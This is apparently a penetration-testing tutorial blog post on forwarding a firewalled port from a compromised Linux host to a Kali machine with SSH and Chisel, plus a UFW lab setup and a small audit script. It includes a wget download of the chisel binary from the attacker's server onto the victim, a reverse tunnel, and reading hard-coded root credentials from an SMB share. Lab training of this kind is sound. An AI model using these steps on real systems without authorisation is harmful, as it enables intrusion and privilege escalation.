Port Forwarding – Linux


Port forwarding is a networking technique that involves redirecting traffic from one network location to another. In the context of penetration testing, it is often used to forward ports from the victim’s machine to the attacker’s machine. This allows the attacker to access resources on the victim’s computer directly from their own machine, which would otherwise be inaccessible to others on the network.

This post focuses on local port forwarding, which can be used when certain ports are blocked from the external network. For example, a port may be blocked to limit access to internal resources or to prevent a webpage from being accessed externally before it’s ready. However, if an attacker gains access to the victim’s machine, they can forward the blocked port and investigate the resources running on it.

For instance, if an attacker gains user-level access to a machine and discovers that port 80 is running locally but was not detected in their initial scan, it’s likely that a firewall blocked their Kali machine from accessing it. With access to the victim’s machine, the attacker can forward port 80 to their Kali machine and examine the resources running on that port.


What you’ll learn

  • Different ways privilege escalation might occur through port forwarding
  • How to forward ports with Chisel
  • How to forward ports with SSH

Privilege Escalation through Port Forwarding

These are some ways you might be able to escalate privileges through different ports:

  • Port 80: We can potentially access sensitive information such as credentials or configuration files. We might even be able to get RCE directly from the site if the site itself is vulnerable.
  • Port 445: Server Message Block (SMB) is a protocol used for file sharing and remote administration. Forwarding this port to Kali allows us to access potentially sensitive files.

SSH

I’m going to go over two different ways to forward ports from a Linux machine to Kali. This first method will be through SSH.

First, let's run an nmap scan to see the open ports:

nmap -p- --min-rate=10000 192.168.4.3

Scenario: We enumerated port 80 and found SSH credentials, which we used to log into the Linux machine. Our next goal is to escalate privileges.

After some enumeration, we find that port 445 is listening locally on the Linux machine. We didn't see port 445 open in our initial scan.

ss -ltn

Let's forward this port to Kali using SSH. Note that binding port 445 on Kali requires root, so run this as root (or pick a local port above 1024 and point smbclient at it with -p):

ssh -N -L 0.0.0.0:445:<UBUNTU_IP>:445 linuser1@<UBUNTU_IP>

Let's try to access port 445 from Kali using the SSH credentials we previously found (smbclient prompts for the password). There's a share named "secrets".

smbclient -L '//127.0.0.1/' -U 'linuser1'

In the share, there seems to be a file called "root.conf".

smbclient '//127.0.0.1/secrets' -U 'linuser1'

Reading the file, we can see that there are hard-coded credentials.

Testing these credentials on SSH gives us access as root.


Chisel

Scenario: We’ve gotten a shell as linuser1 and we’re trying to forward 445 again.

Download chisel from here if you haven't already.

Now host a Python web server on Kali in the directory where the chisel binary is located:

python3 -m http.server 80

On the Ubuntu machine, we can use wget to bring the binary over (the second argument in the original command would have been treated as another URL; -O names the output file):

wget http://192.168.4.4/chisel -O chisel

Then, we use chmod to give it proper permissions so we’re able to execute it.

chmod 700 chisel

Before we run the chisel client on the Ubuntu machine, we should start the chisel server on Kali. Because we want a listener on Kali that relays to the Ubuntu machine, the server must be started with --reverse so the client is allowed to request that.

Now we can run the chisel client on the Ubuntu machine. The R: prefix tells the server to listen on port 445 on Kali and forward each connection to 127.0.0.1:445 on the Ubuntu machine (replace <KALI_IP> and <SERVER_PORT> with the address and port the server was started on):

./chisel client <KALI_IP>:<SERVER_PORT> R:445:127.0.0.1:445

Now we're able to access the SMB shares hidden behind the firewall from Kali.

NOTE: I’m not going to go over the actual privilege escalation part since that was shown in the previous section.


Replicate

In this section, I’ll be demoing how to block a port in Linux so you can replicate port forwarding in your home lab.

First, update the package lists:

sudo apt update

Then, install Uncomplicated Firewall (UFW):

sudo apt install ufw -y

Once it's installed, you need to enable it:

sudo ufw enable

Now we have to change some rules. By default, ufw denies all incoming connections, so this first rule sets the default incoming policy to allow:

sudo ufw default allow

The second rule will reject any connections to port 445 (reject answers with an immediate refusal; deny would silently drop the packets instead). Connections over the loopback interface are still allowed, which is why the service stays reachable from the machine itself:

sudo ufw reject 445/tcp

You can also block NetBIOS (port 139):

sudo ufw reject 139/tcp

Make sure to reload the firewall:

sudo ufw reload

All the ports on Ubuntu except for port 445 (and 139, if you added that rule) should now be reachable from Kali.
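As an added check for the lab (my own script, not part of the original post), the following Python parses the output of the two commands used above, ss -ltn and ufw status, and lists the ports that listen on the host but are rejected by the firewall. That set is exactly what a forward through a compromised account would expose, so it is useful both to confirm the setup and to audit a real server. The sample output is constructed to mirror this lab, not captured from it.

```python
import re

# Constructed sample output of `ss -ltn` and `ufw status` (made up to mirror
# the lab above; not captured from a real machine).
SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       4096    127.0.0.53%lo:53    0.0.0.0:*
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*
LISTEN  0       50      0.0.0.0:445         0.0.0.0:*
LISTEN  0       50      0.0.0.0:139         0.0.0.0:*
LISTEN  0       511     0.0.0.0:80          0.0.0.0:*
LISTEN  0       128     [::]:22             [::]:*
"""

UFW_OUTPUT = """\
Status: active
To                         Action      From
--                         ------      ----
445/tcp                    REJECT      Anywhere
139/tcp                    REJECT      Anywhere
445/tcp (v6)               REJECT      Anywhere (v6)
139/tcp (v6)               REJECT      Anywhere (v6)
"""

def listening_ports(ss_text):
    """Return the set of TCP ports with a LISTEN socket, from `ss -ltn` output."""
    ports = set()
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue  # header line or unexpected format
        # Local address is field 4; the port follows the last ':' (works for
        # "0.0.0.0:445", "127.0.0.53%lo:53" and "[::]:22").
        ports.add(int(fields[3].rsplit(":", 1)[1]))
    return ports

def blocked_ports(ufw_text):
    """Return TCP ports that `ufw status` shows as REJECT or DENY."""
    blocked = set()
    for line in ufw_text.splitlines():
        m = re.match(r"(\d+)/tcp(?: \(v6\))?\s+(REJECT|DENY)\s", line)
        if m:
            blocked.add(int(m.group(1)))
    return blocked

def tunnel_exposed_ports(ss_text, ufw_text):
    """Ports listening on the host but blocked at the firewall: the ones a
    forward over SSH or chisel would expose (loopback traffic is not filtered)."""
    return sorted(listening_ports(ss_text) & blocked_ports(ufw_text))

if __name__ == "__main__":
    print("Listening but firewalled:", tunnel_exposed_ports(SS_OUTPUT, UFW_OUTPUT))
```

On the lab machine, feed it the real output (for example by reading the two commands' stdout via subprocess) in place of the constructed strings.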

Thanks for reading! If you found this post useful, be sure to share it!